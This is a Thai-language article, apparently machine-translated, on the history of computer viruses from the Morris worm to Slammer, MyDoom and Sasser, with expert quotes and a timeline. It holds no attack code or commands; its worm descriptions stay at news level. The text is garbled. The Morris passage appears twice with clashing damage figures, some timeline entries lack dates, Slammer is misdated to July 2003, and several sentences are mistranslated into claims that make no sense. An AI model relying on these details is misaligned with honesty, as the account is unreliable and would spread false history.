“ไม่เคยมีการบันทึกการติดเชื้อในวงกว้างและรวดเร็วเช่นนี้มาก่อน” สแปฟฟอร์ดเน้นย้ำ “อันที่จริง นี่เป็นการโจมตีแบบปฏิเสธการให้บริการครั้งแรกที่ดึงดูดความสนใจของผู้คนในอุตสาหกรรมคอมพิวเตอร์ นอกจากนี้ นี่เป็นงานแรกที่ส่งผลกระทบต่อแพลตฟอร์มของผู้ผลิตหลายรายพร้อมกัน ระบบ Sun และ BSD Unix ถูกโจมตีในเวลาเดียวกัน ซึ่งเกิดขึ้นได้ยากมาก ตามกฎแล้ว การโจมตีมีเป้าหมายเพียงแพลตฟอร์มเดียวเท่านั้น”
Spafford เปรียบเทียบการแพร่กระจายของหนอนมอร์ริสกับการกระทำของบอตเน็ตในปัจจุบัน ซึ่งเป็นเครือข่ายที่เชื่อมต่อคอมพิวเตอร์ที่ติดไวรัสจำนวนมาก โดยใช้พวกมันเพื่อส่งสแปมหรือจัดการการโจมตี DoS แบบกระจาย
“ซอฟต์แวร์เปลี่ยนระบบให้กลายเป็นซอมบี้ และพวกมันก็เหมือนกับเวิร์มที่คลานช้าๆ และเข้าร่วมเป็นบอตเน็ต” Spafford อธิบาย - ระบบเหล่านี้ไม่ก่อให้เกิดการปฏิเสธการให้บริการ แต่ค่อย ๆ รั่วไหลออกไปอีก โดยส่งโค้ดไปยังเครื่องอื่นโดยอัตโนมัติ Botnets ควบคุมเครื่องจักรนับล้านเครื่องอยู่แล้ว ตามการประมาณการ จำนวนเครื่องดังกล่าวสูงถึง 100 ล้านเครื่อง”
หนอนมอร์ริสตัดอินเทอร์เน็ตส่วนใหญ่ออกไปในคราวเดียว การปรากฏตัวของเขาเป็นเหตุการณ์ที่เห็นได้ชัดเจนมาก ในทางตรงกันข้าม การโจมตีทางอินเทอร์เน็ตในปัจจุบันพุ่งเป้าไปที่ระบบแต่ละระบบ และผู้เขียนก็พยายามที่จะไม่ถูกตรวจจับ หากนักเรียนที่อยากรู้อยากเห็นก่อนหน้านี้ถูกแฮ็กเข้าสู่ระบบเพื่อเพิ่มความภาคภูมิใจในตนเอง ไวรัสสมัยใหม่ก็มีแนวโน้มเป็นอาชญากรมากขึ้นเรื่อยๆ โดยปกปิดการมีอยู่ของไวรัสในทุกวิถีทางที่เป็นไปได้
“ทุกวันนี้ การโจมตีทางอินเทอร์เน็ตมีเป้าหมายเพื่อสร้างผลกำไร และการปิดการใช้งานแต่ละส่วนของเครือข่ายไม่ได้สร้างผลกำไรใดๆ เลย” เบลโลวินอธิบาย “ผู้โจมตีที่มีความซับซ้อนจะระมัดระวังอย่างมากในการโจมตีครั้งใหม่”
หนอนมอร์ริสแม้ว่าจะสร้างความเสียหายน้อยกว่ารุ่นต่อๆ ไปมาก แต่ก็ยังคงอยู่ในความทรงจำของชุมชนคอมพิวเตอร์มาเป็นเวลานาน
“หนอนมอร์ริสถือเป็นจุดเริ่มต้นของการพัฒนาอย่างเป็นทางการในด้านความปลอดภัยของคอมพิวเตอร์” ออลแมนเน้นย้ำ - ก่อนหน้านี้ มีผู้เชี่ยวชาญเพียงไม่กี่คนที่จัดการกับปัญหาด้านความปลอดภัย และพวกเขาก็สนใจหัวข้อการเข้ารหัสเป็นหลัก แนวคิดเรื่องความปลอดภัยของคอมพิวเตอร์ได้รับการระบุอย่างแท้จริงว่าเป็นพื้นที่วิจัยแยกต่างหากหลังจากการปรากฏตัวของเวิร์มที่มีชื่อเสียงเท่านั้น”
2 พฤศจิกายน 1988 Robert Morris Jr. นักศึกษาระดับบัณฑิตศึกษาจากภาควิชาวิทยาการคอมพิวเตอร์ที่ Cornell University ติดไวรัสที่เขาเขียนให้กับคอมพิวเตอร์จำนวนมาก ไวรัสได้รับการพัฒนาในตอนแรกว่าไม่เป็นอันตรายและมีเป้าหมายเพียงเพื่อเจาะระบบคอมพิวเตอร์ที่เชื่อมต่อกันด้วยเครือข่ายอย่างลับๆ อาร์ปาเน็ต (ARPANET ถูกเปลี่ยนชื่อเป็นอินเทอร์เน็ตอย่างเป็นทางการในปี 1989)และคงอยู่ที่นั่นโดยไม่ถูกตรวจพบ ไวรัสมอร์ริสเป็นสมาชิกของกลุ่มไวรัสหนอนอินเทอร์เน็ต และเป็นโปรแกรมขนาด 60 กิโลไบต์ที่ออกแบบมาเพื่อแพร่เชื้อระบบปฏิบัติการ UNIX Berkeley 4.3
ในขณะเดียวกันข้อเท็จจริงที่น่าสนใจก็คือบิดาของ "บิดาแห่งไวรัส" - Robert Morris - ผู้อาวุโสในขณะนั้นดำรงตำแหน่งผู้อำนวยการด้านวิทยาศาสตร์ของ National Computer Security Center (NCSC - National Computer Security Center) - ผู้เชี่ยวชาญ ในการรักษาความปลอดภัยคอมพิวเตอร์ Morris Sr. ทำงานเป็นเวลาหลายปีที่ AT&T Bell Laboratory ซึ่งเขามีส่วนร่วมในการพัฒนาโปรแกรม Core Wars ในยุค 60 อย่างไรก็ตาม เหตุการณ์ที่เกิดขึ้นกับโปรแกรมหนอนแทบไม่มีผลกระทบต่ออาชีพของมอร์ริสผู้เฒ่าเลย ในช่วงต้นปี 1989 เขาได้รับเลือกให้เป็นสภาที่ปรึกษาพิเศษของสถาบันมาตรฐานแห่งชาติและกระทรวงพาณิชย์ หน้าที่ของสภานี้คือการพัฒนาความคิดเห็นและข้อเสนอแนะเกี่ยวกับความปลอดภัยของระบบคอมพิวเตอร์ของรัฐบาลสหรัฐฯ ตลอดจนแก้ไขปัญหาที่เกิดขึ้นในการพัฒนาและการนำมาตรฐานความปลอดภัยของข้อมูลไปใช้
เหตุการณ์ไวรัสมอร์ริสทำให้เกิดแรงผลักดันให้เกิดการรักษาความปลอดภัยคอมพิวเตอร์สาขาทั้งหมด - ไวรัสวิทยาคอมพิวเตอร์
ตามการประมาณการแบบอนุรักษ์นิยมที่สุด เหตุการณ์ไวรัส Morris ส่งผลให้สูญเสียการเข้าถึงมากกว่า 8 ล้านชั่วโมง และสูญเสียโดยตรงมากกว่าล้านชั่วโมงในการกู้คืนฟังก์ชันการทำงานของระบบ ต้นทุนรวมของต้นทุนเหล่านี้อยู่ที่ประมาณมากกว่า 98 ล้านดอลลาร์ ไวรัสดังกล่าวติดคอมพิวเตอร์ไปแล้วกว่า 6,200 เครื่อง ผลจากการโจมตีของไวรัส เครือข่ายส่วนใหญ่ใช้งานไม่ได้นานถึงห้าวัน คอมพิวเตอร์ที่ทำหน้าที่สลับ ทำหน้าที่เป็นเซิร์ฟเวอร์ไฟล์ หรือทำหน้าที่สนับสนุนเครือข่ายอื่นๆ ก็ล้มเหลวเช่นกัน ความเสียหายจะยิ่งใหญ่กว่านี้มากหากไวรัสถูกสร้างขึ้นโดยมีวัตถุประสงค์ในการทำลายล้าง
รายงานของอเมริกาจากที่เกิดเหตุซึ่งจัดพิมพ์โดยหนังสือพิมพ์ชั้นนำ เช่น Chicago Tribune, New York Times และ Boston Herald ครอบคลุมอย่างกว้างขวางถึงพลวัตของการแพร่กระจายของไวรัสและการพัฒนาวิธีการต่อสู้กับมันตลอดจนปัญหาทั่วไป ในการดูแลความปลอดภัยของระบบคอมพิวเตอร์ ต่อมา บทความเชิงวิเคราะห์ในโอกาสนี้ได้ก่อให้เกิดปัญหาที่ไม่ได้รับการแก้ไขที่เกี่ยวข้องกับความปลอดภัยของระบบคอมพิวเตอร์ และความคิดริเริ่มด้านกฎหมายที่มุ่งป้องกันกรณีดังกล่าวในอนาคต โดยเฉพาะอย่างยิ่ง มีการนำร่างกฎหมายสองฉบับมาใช้ในสภาผู้แทนราษฎรซึ่งมีบทลงโทษทางอาญาสำหรับการผลิตและการเผยแพร่ไวรัสคอมพิวเตอร์
นอกจากนี้ ยังมีการถกเถียงกันอย่างกว้างขวางเกี่ยวกับวิธีการจำแนกการกระทำของมอร์ริส เช่น มอร์ริสเป็นแฮ็กเกอร์ผู้กล้าหาญที่ชี้ให้เห็นจุดอ่อนในเครือข่ายคอมพิวเตอร์ระดับชาติโดยไม่สร้างความเสียหายร้ายแรงหรือไม่ หรือเขาเป็นอาชญากรที่ควรได้รับการลงโทษอย่างรุนแรงหรือไม่ ในเวลาเดียวกันเขาถูกไล่ออกจากมหาวิทยาลัยคอร์เนลแล้ว (มีสิทธิ์สมัครใหม่ได้ภายในหนึ่งปี) ดังนั้นมอร์ริสสามารถสมัครใหม่เพื่อรับเข้าเรียนได้ไม่เร็วกว่าฤดูใบไม้ร่วงปี 1990 ในกรณีนี้ ฝ่ายบริหารจะเป็นผู้ตัดสินคำถามเกี่ยวกับการรับเข้าเรียนของเขา
“ประวัติศาสตร์สมัยใหม่” ของไวรัสคอมพิวเตอร์
- อาร์ปาเน็ตเปลี่ยนชื่ออย่างเป็นทางการเป็น อินเทอร์เน็ต.
ปรากฏขึ้น โรคเอดส์ "ม้าโทรจัน"- ไวรัสทำให้ข้อมูลทั้งหมดในฮาร์ดไดรฟ์ไม่สามารถเข้าถึงได้ และแสดงข้อความเดียวบนหน้าจอ: “ส่งเช็คมูลค่า 189 ดอลลาร์ไปยังที่อยู่ดังกล่าว” ผู้เขียนโครงการถูกจับกุมขณะกำลังหาเงินและถูกตัดสินว่ามีความผิดฐานขู่กรรโชกทรัพย์
ไวรัสถูกสร้างขึ้นเพื่อต่อต้านซอฟต์แวร์ป้องกันไวรัส (“ Dark Avenger” - The Dark Avenger- มันติดไวรัสไฟล์ใหม่ในขณะที่โปรแกรมป้องกันไวรัสสแกนฮาร์ดไดรฟ์ของคอมพิวเตอร์
Cliff Stoll พนักงานของห้องปฏิบัติการแห่งชาติ Lawrence Berkeley ได้ตีพิมพ์หนังสือ "The Cuckoo's Egg" ซึ่งเขาเตือนว่าเครือข่ายคอมพิวเตอร์ทั่วโลกไม่เพียงแต่สามารถตอบสนองจุดประสงค์แห่งความดีเท่านั้น แต่ยังถูกนำไปใช้อย่างแข็งขันโดยทหาร อาชญากร และ อันธพาล Stoll แนะนำให้ใช้มาตรการล่วงหน้าเพื่อป้องกันการพัฒนาดังกล่าว
1990(ธันวาคม). European Institute for Computer Antivirus Research (EICAR) ก่อตั้งขึ้นในเมืองฮัมบูร์ก (ประเทศเยอรมนี) ปัจจุบันเป็นหนึ่งในองค์กรระหว่างประเทศที่ได้รับการยอมรับมากที่สุด โดยรวบรวมบริษัทแอนตี้ไวรัสรายใหญ่เกือบทุกแห่งให้เป็นหนึ่งเดียวกัน
1991โปรแกรมได้รับการเขียนขึ้นสำหรับการสร้างไวรัสโดยเฉพาะ - VCSvl.0
ไวรัส ซาตานแมลงส่งผลกระทบต่อคอมพิวเตอร์หลายร้อยเครื่องในกรุงวอชิงตัน เมืองหลวงของสหรัฐอเมริกา แม้แต่คอมพิวเตอร์ของทำเนียบขาวก็ยังประสบปัญหา FBI จับกุมผู้เขียนซึ่งกลายเป็นวัยรุ่นอายุ 12 ปี
รูปลักษณ์ภายนอกถูกบันทึกไว้ "ระเบิดเวลา"– ไวรัสที่เริ่มทำงานเมื่อถึงวันที่กำหนด
1994ผู้เขียนไวรัสหลายคนถูกจับกุมในสหราชอาณาจักร สหรัฐอเมริกา และนอร์เวย์ พวกเขาได้รับค่าปรับ
1995รูปร่าง มาโครไวรัสออกแบบมาเพื่อเอาชนะสภาพแวดล้อมซอฟต์แวร์ MS Word
1999ไวรัสเมล เมลิสซา ทำให้เกิดโรคระบาดทั่วโลก ส่งผลกระทบต่อคอมพิวเตอร์หลายหมื่นเครื่อง และสร้างความเสียหายมูลค่า 80 ล้านเหรียญสหรัฐ หลังจากเหตุการณ์นี้ ความต้องการโปรแกรมป้องกันไวรัสเริ่มลดลงทั่วโลก ในปี 2002 ผู้เขียน Melissa ซึ่งเป็นโปรแกรมเมอร์วัย 33 ปี David L. Smith ถูกตัดสินให้จำคุก 20 เดือน
พ.ศ. 2543 พฤษภาคมบันทึกของ Melissa ถูกทำลายด้วยไวรัสอีเมล ฉันรักคุณ! ส่งผลกระทบต่อคอมพิวเตอร์หลายล้านเครื่องภายในเวลาไม่กี่ชั่วโมง ลักษณะเฉพาะของไวรัสคือไฟล์ที่มีตัวไวรัสติดอยู่กับจดหมายจะถูกเปิดใช้งานโดยอัตโนมัติเมื่อผู้ใช้เปิดจดหมายเพื่ออ่าน การสอบสวนพบว่าไวรัสถูกสร้างขึ้นโดยนักศึกษาชาวฟิลิปปินส์ซึ่งไม่ถูกตัดสินว่ามีความผิดเนื่องจากขาดกฎหมายที่เกี่ยวข้องในกฎหมายของฟิลิปปินส์ ในปีเดียวกันนั้น ได้มีการลงนามข้อตกลงระหว่างประเทศฉบับแรกเกี่ยวกับการต่อสู้กับไวรัสคอมพิวเตอร์
2544อินเทอร์เน็ตได้รับผลกระทบจากไวรัสอีเมล แอนนา คูร์นิโควา- Jan De Wit ชาวดัตช์วัย 20 ปี ถูกตัดสินจำคุก 150 ชั่วโมงในราชทัณฑ์ฐานสร้างไวรัสชนิดนี้ ศาลสรุปว่าไม่สามารถระบุขอบเขตความเสียหายที่ Anna Kournikova ก่อให้เกิดต่อเศรษฐกิจเนเธอร์แลนด์ได้อย่างแม่นยำ เดอวิทก็ยึดไวรัสรวมกว่า 7.5 พันตัวด้วย เดอ วิท เล่าต่อศาลว่าเขาไม่รู้ว่าโปรแกรมที่เขาเขียนจะกลายเป็นไวรัสและเป็นอันตรายต่อใครก็ตาม
2545เซิร์ฟเวอร์ DNS ฮับอินเทอร์เน็ต 13 เครื่องที่รับรองการทำงานของเวิลด์ไวด์เว็บถูกโจมตี DoS ที่จัดขึ้นโดยใช้ไวรัสเครือข่าย นักวิเคราะห์เตือนว่าการโจมตีทางคอมพิวเตอร์ที่เตรียมการและดำเนินการมาอย่างดีอาจทำลายอินเทอร์เน็ตได้นานหลายสัปดาห์
2546(กรกฎาคม). ทำลายสถิติความเร็วของการแพร่กระจาย "หนอน" สแลมเมอร์ซึ่งติดเชื้อคอมพิวเตอร์ 75,000 เครื่องใน 10 นาที ผลจากการเปิดใช้งานไวรัสเวิร์ม Slammer ทำให้ความเร็วของเครือข่ายช้าลงอย่างมาก และบางภูมิภาค เช่น เกาหลีใต้ ถูกตัดขาดจากอินเทอร์เน็ต
การโจมตีของไวรัสเริ่มต้นเมื่อเวลา 00.30 น. ตามเวลาชายฝั่งตะวันออกของสหรัฐฯ หรือ 8.30 น. ตามเวลามอสโก ยังไม่ทราบแน่ชัดว่าแหล่งที่มาของการติดเชื้ออยู่ที่ใด ผู้เชี่ยวชาญด้านความปลอดภัยคอมพิวเตอร์บางคนแนะนำว่าไวรัสแพร่กระจายมาจากสหรัฐอเมริกา ในขณะที่คนอื่นๆ เชื่อว่าบ้านเกิดของมันอยู่ที่ไหนสักแห่งในเอเชีย ภายในเวลาไม่กี่นาที เวิร์มที่ใช้ช่องโหว่ในระบบฐานข้อมูล Microsoft SQL Server 2000 ก็ท่วมอินเทอร์เน็ต แม้ว่าไวรัสจะมีขนาดเล็กก็ตาม ( 376 ไบต์) เขาสามารถสร้างการจราจรติดขัดจริงในช่องการส่งข้อมูลได้ เพราะหลังจากติดไวรัสในคอมพิวเตอร์ เขาเริ่มส่งรหัสของเขาไปยังที่อยู่ IP แบบสุ่มในวงวนไม่รู้จบ หากพบคอมพิวเตอร์ที่มีช่องโหว่ตามที่อยู่ใดๆ คอมพิวเตอร์นั้นจะติดไวรัสและเริ่มส่งสำเนาของไวรัสออกไปด้วย
ทั้งหมดนี้นำไปสู่การเติบโตของปริมาณการใช้ข้อมูลขนาดใหญ่ เมื่อเวิร์มทำงานถึงจุดสูงสุด เซิร์ฟเวอร์หนึ่งเครื่องสามารถรับคำขอได้หลายร้อยคำขอต่อนาที ไม่สามารถทนต่อการโหลดที่เพิ่มขึ้นได้ เซิร์ฟเวอร์บางแห่งจึงหยุดทำงานตามปกติ ในเวลานี้ ในสหรัฐอเมริกาเพียงประเทศเดียว แพ็กเก็ต IP มากถึง 20% สูญหาย ซึ่งมากกว่าระดับปกติถึงสิบเท่า ตามรายงาน เซิร์ฟเวอร์ DNS หลักห้าในสิบสามเซิร์ฟเวอร์ก็ได้รับผลกระทบจากการโจมตีเช่นกัน
ข้อผิดพลาดรหัสซอฟต์แวร์ใน MS SQL Server 2000 เป็นที่รู้จักในช่วงฤดูร้อนปี 2545 และมีการแก้ไขอยู่ในแพ็คเกจการอัปเดตที่ออกโดย Microsoft เซอร์วิสแพ็ค 3- อย่างไรก็ตาม ผู้ดูแลระบบเริ่มติดตั้งแพตช์หลังจากการโจมตี Slammer เท่านั้น อย่างไรก็ตาม มีเพียงไม่กี่คนที่ประสบความสำเร็จ: เว็บไซต์ Microsoft ซึ่งสามารถรับได้เฉพาะ Service Pack เท่านั้นกลับกลายเป็นว่ามีการโอเวอร์โหลด
27 มกราคม 2547จุดเริ่มต้นของการแพร่ระบาดของหนอนไปรษณีย์ขนาดใหญ่ โนวาร์กหรือที่เรียกว่า มายดูม- บริษัทแอนตี้ไวรัสทุกแห่งได้กำหนดให้เวิร์มนี้อยู่ในระดับอันตรายสูงสุด จำนวนอีเมลที่ติดไวรัสบนอินเทอร์เน็ตมีจำนวนหลายล้านสำเนา
เวิร์มแพร่กระจายผ่านทางอินเทอร์เน็ตในรูปแบบของไฟล์ที่แนบมากับอีเมลที่ติดไวรัส เวิร์มนี้เป็นแอปพลิเคชัน Windows (ไฟล์ PE EXE) ขนาด 22,528 ไบต์ บรรจุใน UPX ขนาดของไฟล์ที่แตกออกมาคือประมาณ 40KB เวิร์มจะเปิดใช้งานก็ต่อเมื่อผู้ใช้เปิดไฟล์เก็บถาวรและเรียกใช้ไฟล์ที่ติดไวรัส (โดยดับเบิลคลิกที่ไฟล์แนบ) จากนั้นเวิร์มจะติดตั้งตัวเองเข้าสู่ระบบและเริ่มขั้นตอนการแพร่กระจาย เวิร์มมีฟังก์ชันแบ็คดอร์ที่ใช้เปิดพอร์ต TCP ด้วย 3127 โดย 3198 ซึ่งทำให้สามารถควบคุมระบบที่ติดไวรัสจากระยะไกล ค้นหาที่อยู่อีเมลในสมุดที่อยู่ Outlook และส่งตัวเองไปยังที่อยู่เหล่านี้โดยใช้ไคลเอนต์ SMTP ของตัวเอง และยังได้รับการตั้งโปรแกรมให้ทำการโจมตี DoS บนไซต์ www.sco .com และ www.microsoft.com
ความเสียหายจากการแพร่ระบาดของไวรัส MyDoom (หรือที่รู้จักกันในชื่อ Novarq) กลายเป็นความเสียหายครั้งใหญ่ที่สุดในประวัติศาสตร์ของการแพร่ระบาดทางอินเทอร์เน็ต โดยมีมูลค่า 2.6 พันล้านดอลลาร์ การประมาณการดังกล่าวมีอยู่ในรายงานของผู้เชี่ยวชาญภาษาอังกฤษจากบริษัท Mi2g
3 พฤษภาคม 2547หนอน Sasser ตัวใหม่ถูกค้นพบบนอินเทอร์เน็ต เวิร์มได้รับการจัดอันดับภัยคุกคามสูงสุด ตามที่นักวิเคราะห์ระบุว่าคอมพิวเตอร์ธรรมดาที่เชื่อมต่อกับอินเทอร์เน็ตและไม่มีมาตรการรักษาความปลอดภัยจะเสี่ยงต่อการติดเชื้อจากเวิร์มภายใน 10 นาที
Sasser ได้รับการเผยแพร่โดยการใช้ประโยชน์จากจุดบกพร่องบัฟเฟอร์ล้นในกระบวนการ lsass.exe บนระบบเซิร์ฟเวอร์ Windows 2000, XP และ 2003 หลังจากติดไวรัสในระบบแล้ว เวิร์มจะเริ่มใช้เพื่อโจมตีคอมพิวเตอร์เครื่องอื่นผ่านทางพอร์ต TCP 445
เวิร์มเปิดใช้งานโดยไม่ต้องมีการแทรกแซงจากผู้ใช้ และสามารถแพร่เชื้อไปยังคอมพิวเตอร์ทุกเครื่องที่เชื่อมต่อกับเครือข่าย ไม่ว่าคอมพิวเตอร์นั้นจะถูกใช้งานอยู่หรือไม่ก็ตาม สัญญาณของการติดไวรัส ได้แก่ ข้อความแสดงข้อผิดพลาดของระบบต่างๆ และการรีบูตระบบโดยธรรมชาติ
ประวัติความเป็นมาเพิ่มเติมของการพัฒนาไวรัสคอมพิวเตอร์มีความเกี่ยวพันอย่างใกล้ชิดกับประวัติความเป็นมาของการพัฒนาซอฟต์แวร์ที่เป็นอันตรายโดยทั่วไป ไม่มีการค้นพบเชิงสร้างสรรค์ที่มีเอกลักษณ์เฉพาะตัว แต่ความปรารถนาที่จะทำกำไรอย่างง่ายดายของผู้โจมตีที่ใช้ซอฟต์แวร์นี้ปรากฏชัดเจนมากขึ้น
ในปี 1988 เวิร์มเครือข่ายที่แพร่หลายตัวแรกถูกสร้างขึ้นโดย Robert Morris Jr. โปรแกรม 60,000 ไบต์ได้รับการออกแบบมาเพื่อเอาชนะระบบปฏิบัติการ UNIX Berkeley 4.3 ในตอนแรกไวรัสได้รับการออกแบบมาให้ไม่เป็นอันตรายและมีจุดประสงค์เพื่อเจาะระบบคอมพิวเตอร์ที่เชื่อมต่อโดยเครือข่าย ARPANET อย่างซ่อนเร้นเท่านั้นและยังคงตรวจไม่พบที่นั่น โปรแกรมไวรัสมีส่วนประกอบที่อนุญาตให้เปิดเผยรหัสผ่านที่มีอยู่ในระบบที่ติดไวรัส ซึ่งทำให้โปรแกรมปลอมแปลงเป็นงานของผู้ใช้ระบบที่ถูกต้องตามกฎหมาย ในขณะเดียวกันก็สร้างและส่งสำเนาจริง ๆ ไวรัสไม่ได้ถูกซ่อนและปลอดภัยอย่างสมบูรณ์ตามที่ผู้เขียนตั้งใจไว้ เนื่องจากมีข้อผิดพลาดเล็กน้อยที่เกิดขึ้นระหว่างการพัฒนา ซึ่งนำไปสู่การแพร่กระจายไวรัสด้วยตนเองอย่างรวดเร็วที่ไม่สามารถควบคุมได้
ตามการประมาณการแบบอนุรักษ์นิยมที่สุด เหตุการณ์หนอนมอร์ริสต้องสูญเสียการเข้าถึงมากกว่า 8 ล้านชั่วโมง และการสูญเสียโดยตรงมากกว่าล้านชั่วโมงในการกู้คืนฟังก์ชันการทำงานของระบบ ต้นทุนรวมของต้นทุนเหล่านี้อยู่ที่ประมาณ 96 ล้านดอลลาร์ (จำนวนเงินนี้ยังไม่รวมค่าใช้จ่ายในการสรุประบบปฏิบัติการด้วย) ความเสียหายจะยิ่งใหญ่กว่านี้มากหากไวรัสถูกสร้างขึ้นมาโดยมีวัตถุประสงค์ในการทำลายล้าง
หนอนมอร์ริสติดเชื้อคอมพิวเตอร์มากกว่า 6,200 เครื่อง ผลจากการโจมตีของไวรัส เครือข่ายส่วนใหญ่ใช้งานไม่ได้นานถึงห้าวัน คอมพิวเตอร์ที่ทำหน้าที่สลับ ทำหน้าที่เป็นเซิร์ฟเวอร์ไฟล์ หรือทำหน้าที่สนับสนุนเครือข่ายอื่นๆ ก็ล้มเหลวเช่นกัน
เมื่อวันที่ 4 พฤษภาคม พ.ศ. 2533 คณะลูกขุนพบว่ามอร์ริสมีความผิด เขาถูกตัดสินให้คุมประพฤติ 2 ปี ทำงานรับใช้สังคม 400 ชั่วโมง และปรับ 10,000 ดอลลาร์
อาชญากรรมทางข้อมูลและโรคเอดส์
ในปี 1989 ไวรัส DATACRIME แพร่หลายซึ่งเริ่มตั้งแต่วันที่ 12 ตุลาคมได้ทำลายระบบไฟล์และก่อนวันที่ดังกล่าวก็ทวีคูณมากขึ้น ไวรัสคอมพิวเตอร์ชุดนี้เริ่มแพร่กระจายในเนเธอร์แลนด์ สหรัฐอเมริกา และญี่ปุ่นในต้นปี 1989 และภายในเดือนกันยายนได้แพร่ระบาดไปยังพีซีประมาณ 100,000 เครื่องในเนเธอร์แลนด์เพียงแห่งเดียว (ซึ่งคิดเป็นประมาณ 10% ของจำนวนทั้งหมดในประเทศ) แม้แต่ IBM ก็ตอบสนองต่อภัยคุกคามนี้ด้วยการปล่อยตัวตรวจจับ VIRSCAN ซึ่งช่วยให้คุณสามารถค้นหาลักษณะสตริง (ลายเซ็น) ของไวรัสเฉพาะในระบบไฟล์ได้ ผู้ใช้สามารถเสริมและเปลี่ยนแปลงชุดลายเซ็นได้
ในปี 1989 ม้าโทรจันตัวแรกที่มีชื่อว่า AIDS ก็ได้ปรากฏตัวขึ้น ไวรัสทำให้ข้อมูลทั้งหมดในฮาร์ดไดรฟ์ไม่สามารถเข้าถึงได้ และแสดงข้อความเดียวบนหน้าจอ: “ส่งเช็คมูลค่า 189 ดอลลาร์ไปยังที่อยู่ดังกล่าว” ผู้เขียนโปรแกรมถูกจับกุมขณะขึ้นเงินจากเช็คและถูกตัดสินว่ามีความผิดฐานขู่กรรโชก
ไวรัสตัวแรกที่ต่อต้านซอฟต์แวร์ป้องกันไวรัสก็ถูกสร้างขึ้นเช่นกัน - The Dark Avenger มันติดไวรัสไฟล์ใหม่ในขณะที่โปรแกรมป้องกันไวรัสสแกนฮาร์ดไดรฟ์ของคอมพิวเตอร์
